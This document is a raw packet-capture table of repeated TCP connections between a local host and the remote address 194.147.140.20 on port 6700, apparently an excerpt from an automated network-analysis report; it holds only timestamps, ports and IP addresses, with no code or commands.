Sep 14, 2021 17:03:46.416701078 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.416706085 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.416742086 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.416786909 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.416793108 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.416862965 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.416873932 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.416953087 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.416975975 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.417028904 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.417095900 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.417119980 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.417141914 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.417167902 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.417279005 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:47.180087090 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:51.730535030 CEST	49784	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:51.919810057 CEST	6700	49784	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:51.920749903 CEST	49784	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:51.921426058 CEST	49784	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:52.122484922 CEST	6700	49784	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:52.123146057 CEST	49784	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:52.312546015 CEST	6700	49784	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:52.312720060 CEST	49784	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:52.569487095 CEST	6700	49784	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:52.569638014 CEST	49784	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:52.866182089 CEST	6700	49784	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:52.916158915 CEST	6700	49784	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:52.958082914 CEST	49784	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:53.102662086 CEST	49784	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:53.148452044 CEST	6700	49784	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:53.192503929 CEST	49784	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:53.351085901 CEST	6700	49784	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:53.351166964 CEST	49784	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:53.801922083 CEST	49784	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:53.991995096 CEST	6700	49784	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:54.016664028 CEST	49784	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:54.205913067 CEST	6700	49784	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:54.224467039 CEST	49784	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:54.475817919 CEST	6700	49784	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:54.524837971 CEST	49784	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:58.766292095 CEST	49785	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:58.955651999 CEST	6700	49785	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:58.955765963 CEST	49785	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:58.957276106 CEST	49785	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:59.160839081 CEST	6700	49785	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:59.161221027 CEST	49785	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:59.350980997 CEST	6700	49785	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:59.352216959 CEST	49785	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:59.601145029 CEST	6700	49785	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:59.601250887 CEST	49785	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:59.700731039 CEST	6700	49785	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:59.755665064 CEST	49785	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:59.790472984 CEST	6700	49785	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:59.790719986 CEST	49785	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:59.945967913 CEST	6700	49785	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:59.989976883 CEST	49785	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:00.038609982 CEST	6700	49785	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:00.038695097 CEST	49785	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:00.180610895 CEST	6700	49785	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:00.180704117 CEST	49785	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:00.296833992 CEST	6700	49785	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:00.370238066 CEST	6700	49785	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:00.396826982 CEST	49785	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:00.647382975 CEST	6700	49785	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:01.435813904 CEST	49785	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:05.716645956 CEST	49786	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:05.906508923 CEST	6700	49786	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:05.906704903 CEST	49786	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:05.932305098 CEST	49786	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:06.132165909 CEST	6700	49786	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:06.132652998 CEST	49786	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:06.324487925 CEST	6700	49786	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:06.326334000 CEST	49786	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:06.584338903 CEST	6700	49786	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:06.584503889 CEST	49786	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:06.815324068 CEST	6700	49786	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:06.824003935 CEST	49786	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:07.014010906 CEST	6700	49786	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:07.015472889 CEST	49786	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:07.205190897 CEST	6700	49786	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:07.205360889 CEST	49786	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:07.404994011 CEST	6700	49786	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:07.461230993 CEST	49786	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:07.479192972 CEST	49786	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:07.716363907 CEST	6700	49786	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:08.124795914 CEST	6700	49786	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:08.178374052 CEST	49786	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:08.475902081 CEST	49786	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:12.581885099 CEST	49787	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:12.771354914 CEST	6700	49787	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:12.771569014 CEST	49787	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:12.772973061 CEST	49787	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:12.991136074 CEST	6700	49787	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:12.991245985 CEST	49787	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:13.231941938 CEST	6700	49787	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:13.232106924 CEST	49787	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:13.422986031 CEST	6700	49787	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:13.425523043 CEST	49787	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:13.668869019 CEST	6700	49787	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:13.820281982 CEST	49787	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:13.833178043 CEST	6700	49787	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:13.882023096 CEST	49787	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:14.009717941 CEST	6700	49787	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:14.010029078 CEST	49787	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:14.262403011 CEST	6700	49787	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:14.262553930 CEST	49787	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:14.452169895 CEST	6700	49787	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:14.506942034 CEST	49787	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:14.697206974 CEST	6700	49787	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:14.741233110 CEST	49787	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:14.820261002 CEST	49787	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:19.163357973 CEST	49788	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:19.353147030 CEST	6700	49788	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:19.353255987 CEST	49788	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:19.356749058 CEST	49788	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:19.557933092 CEST	6700	49788	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:19.558413982 CEST	49788	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:19.748147964 CEST	6700	49788	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:19.749892950 CEST	49788	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:19.998696089 CEST	6700	49788	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:20.034198999 CEST	49788	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:20.080363989 CEST	6700	49788	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:20.132287979 CEST	49788	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:20.223773003 CEST	6700	49788	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:20.223922014 CEST	49788	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:20.465902090 CEST	6700	49788	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:20.466042042 CEST	49788	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:20.655509949 CEST	6700	49788	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:20.710503101 CEST	49788	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:20.902992964 CEST	6700	49788	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:20.945003986 CEST	49788	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:21.008572102 CEST	49788	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:21.252752066 CEST	6700	49788	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:22.070780039 CEST	49788	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:26.174730062 CEST	49789	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:26.364202976 CEST	6700	49789	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:26.364399910 CEST	49789	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:26.365077972 CEST	49789	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:26.564702988 CEST	6700	49789	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:26.565157890 CEST	49789	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:26.754797935 CEST	6700	49789	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:26.756145954 CEST	49789	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:26.999077082 CEST	6700	49789	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:27.071335077 CEST	49789	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:27.114495039 CEST	6700	49789	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:27.179929018 CEST	49789	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:27.260653973 CEST	6700	49789	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:27.260902882 CEST	49789	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:27.516697884 CEST	6700	49789	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:27.516925097 CEST	49789	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:27.706995964 CEST	6700	49789	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:27.758104086 CEST	49789	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:27.947833061 CEST	6700	49789	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:27.992501020 CEST	49789	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:28.071604967 CEST	49789	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:28.327725887 CEST	6700	49789	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:29.071568012 CEST	49789	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:34.399446011 CEST	49790	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:34.589931011 CEST	6700	49790	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:34.591496944 CEST	49790	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:35.028105974 CEST	49790	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:35.229712963 CEST	6700	49790	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:35.231292009 CEST	49790	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:35.423245907 CEST	6700	49790	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:35.423414946 CEST	49790	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:35.668308020 CEST	6700	49790	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:35.670727968 CEST	49790	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:35.920855045 CEST	6700	49790	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:36.045862913 CEST	6700	49790	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:36.046797037 CEST	49790	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:36.238255978 CEST	6700	49790	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:36.258435965 CEST	49790	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:36.449574947 CEST	6700	49790	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:36.449747086 CEST	49790	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:36.641520023 CEST	6700	49790	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:36.844959021 CEST	49790	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:37.011708021 CEST	6700	49790	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:37.011815071 CEST	49790	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:37.361876011 CEST	49790	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:41.710550070 CEST	49799	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:41.901633024 CEST	6700	49799	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:41.902304888 CEST	49799	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:41.933595896 CEST	49799	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:42.135440111 CEST	6700	49799	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:42.167521954 CEST	49799	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:42.358407021 CEST	6700	49799	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:42.387490988 CEST	49799	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:42.621128082 CEST	6700	49799	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:42.621222973 CEST	49799	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:42.728952885 CEST	6700	49799	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:42.785394907 CEST	49799	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:42.811779976 CEST	6700	49799	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:42.815958023 CEST	49799	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:42.978856087 CEST	6700	49799	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:43.019834042 CEST	49799	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:43.049844980 CEST	6700	49799	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:43.051141024 CEST	49799	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:43.242695093 CEST	6700	49799	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:43.244221926 CEST	49799	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:43.434750080 CEST	6700	49799	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:43.488596916 CEST	49799	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:43.520781040 CEST	49799	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:43.768362045 CEST	6700	49799	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:44.576694965 CEST	49799	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:48.971359015 CEST	49802	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:49.162087917 CEST	6700	49802	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:49.162657976 CEST	49802	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:49.163443089 CEST	49802	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:49.376421928 CEST	6700	49802	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:49.376840115 CEST	49802	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:49.567675114 CEST	6700	49802	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:49.569463015 CEST	49802	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:49.825948000 CEST	6700	49802	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:49.826231956 CEST	49802	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:49.937781096 CEST	6700	49802	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:49.989168882 CEST	49802	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:50.016372919 CEST	6700	49802	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:50.016547918 CEST	49802	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:50.180696964 CEST	6700	49802	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:50.223612070 CEST	49802	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:50.263662100 CEST	6700	49802	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:50.263818979 CEST	49802	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:50.454900980 CEST	6700	49802	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:50.455070972 CEST	49802	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:50.645692110 CEST	6700	49802	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:50.692383051 CEST	49802	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:50.725061893 CEST	49802	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:50.966625929 CEST	6700	49802	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:51.806521893 CEST	49802	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:56.167172909 CEST	49803	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:56.358052969 CEST	6700	49803	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:56.358163118 CEST	49803	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:56.473969936 CEST	49803	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:56.676776886 CEST	6700	49803	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:56.700529099 CEST	49803	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:56.905781031 CEST	6700	49803	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:56.906070948 CEST	49803	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:57.150702000 CEST	6700	49803	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:57.150846004 CEST	49803	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:57.400228977 CEST	6700	49803	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:57.606704950 CEST	6700	49803	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:57.607861996 CEST	49803	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:57.798551083 CEST	6700	49803	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:57.800580025 CEST	49803	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:57.993556023 CEST	6700	49803	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:57.993710995 CEST	49803	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:58.184400082 CEST	6700	49803	194.147.140.20	192.168.2.5
Sep 14, 2021 17:04:58.239928007 CEST	49803	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:04:58.834127903 CEST	49803	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:03.150372982 CEST	49804	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:03.341872931 CEST	6700	49804	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:03.342052937 CEST	49804	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:03.343333960 CEST	49804	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:03.557703972 CEST	6700	49804	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:03.599677086 CEST	49804	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:03.614881039 CEST	49804	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:03.807539940 CEST	6700	49804	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:03.849701881 CEST	49804	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:03.955110073 CEST	49804	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:04.192401886 CEST	6700	49804	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:04.192769051 CEST	49804	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:04.444833994 CEST	6700	49804	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:04.524216890 CEST	6700	49804	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:04.550817013 CEST	49804	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:04.750461102 CEST	6700	49804	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:04.770044088 CEST	49804	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:04.969336033 CEST	6700	49804	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:04.969537020 CEST	49804	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:05.165285110 CEST	6700	49804	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:05.166105986 CEST	49804	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:05.362662077 CEST	6700	49804	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:05.412333965 CEST	49804	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:06.249332905 CEST	49804	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:10.356698036 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:10.548403025 CEST	6700	49805	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:10.548562050 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:10.549490929 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:10.758537054 CEST	6700	49805	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:10.803437948 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:10.883570910 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:11.079602957 CEST	6700	49805	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:11.080897093 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:11.336309910 CEST	6700	49805	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:11.336390972 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:11.498723030 CEST	6700	49805	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:11.531054020 CEST	6700	49805	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:11.531213999 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:11.646028042 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:11.727464914 CEST	6700	49805	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:11.772223949 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:11.902786016 CEST	6700	49805	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:11.902906895 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:12.098969936 CEST	6700	49805	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:12.147285938 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:12.241570950 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:12.342924118 CEST	6700	49805	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:12.397301912 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:12.480845928 CEST	6700	49805	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:13.021048069 CEST	6700	49805	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:13.069267988 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:13.883162975 CEST	49805	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:18.318615913 CEST	49806	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:18.514379978 CEST	6700	49806	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:18.514560938 CEST	49806	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:18.815045118 CEST	49806	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:19.028436899 CEST	6700	49806	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:19.028805017 CEST	49806	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:19.223001957 CEST	6700	49806	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:19.223135948 CEST	49806	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:19.467771053 CEST	6700	49806	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:19.474741936 CEST	49806	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:19.730654955 CEST	6700	49806	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:19.827378035 CEST	6700	49806	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:19.882424116 CEST	49806	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:19.933315992 CEST	49806	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:20.074289083 CEST	6700	49806	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:20.116808891 CEST	49806	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:20.183693886 CEST	6700	49806	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:20.183978081 CEST	49806	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:20.377211094 CEST	6700	49806	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:20.377631903 CEST	49806	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:20.571536064 CEST	6700	49806	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:20.616880894 CEST	49806	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:05:21.148626089 CEST	6700	49806	194.147.140.20	192.168.2.5
Sep 14, 2021 17:05:21.195075989 CEST	49806	6700	192.168.2.5	194.147.140.20
